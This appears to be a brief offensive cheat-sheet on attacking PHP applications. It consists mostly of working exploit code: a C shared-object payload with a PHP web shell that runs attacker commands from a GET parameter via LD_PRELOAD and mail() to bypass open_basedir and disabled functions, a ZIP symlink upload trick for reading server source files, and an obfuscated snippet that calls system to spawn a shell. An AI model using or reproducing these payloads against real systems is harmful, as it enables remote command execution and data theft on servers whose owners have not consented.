Php

Bypass open_basedir and “disabled” functionaly

Bug description: https://bugs.php.net/bug.php?id=46741
Tools: git clone https://github.com/TarlogicSecurity/Chankro.git
Practical example:

/* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload(char *cmd) {
  char buf[512];
  strcpy(buf, cmd);
  strcat(buf, " > /tmp/_0utput.txt");
  system(buf);
}

int  geteuid() {
  char *cmd;
  if (getenv("LD_PRELOAD") == NULL) { return 0; }
  unsetenv("LD_PRELOAD");
  if ((cmd = getenv("_evilcmd")) != NULL) {
    payload(cmd);
  }
  return 1;
}

<?php
  $cmd = $_GET['cmd'];

  echo putenv("LD_PRELOAD=/var/www/html/upload/XXXXXXXXXXXX-evil.so");
  echo putenv("_evilcmd=".$_GET['cmd']);
  echo mail("a@example.com", "a", "a");
  show_source("/tmp/_0utput.txt");
?>

Upload zip file

ZIP link

$ ln -s ../../../../../var/www/index.php myfile
[...]
$ zip --symlinks a.zip myfile

By uploading the ZIP file, if website performs UNZIP without been cautious, it will be possible to retrieve source code.

Bypass protection (get /bin/sh)

define(v, systaem);
define(y, shxsh);
array_map(implode(explode(a, v)), explode(x, y));
̀̀̀```

Last updated on Friday, July 10, 2020
Published on Friday, July 10, 2020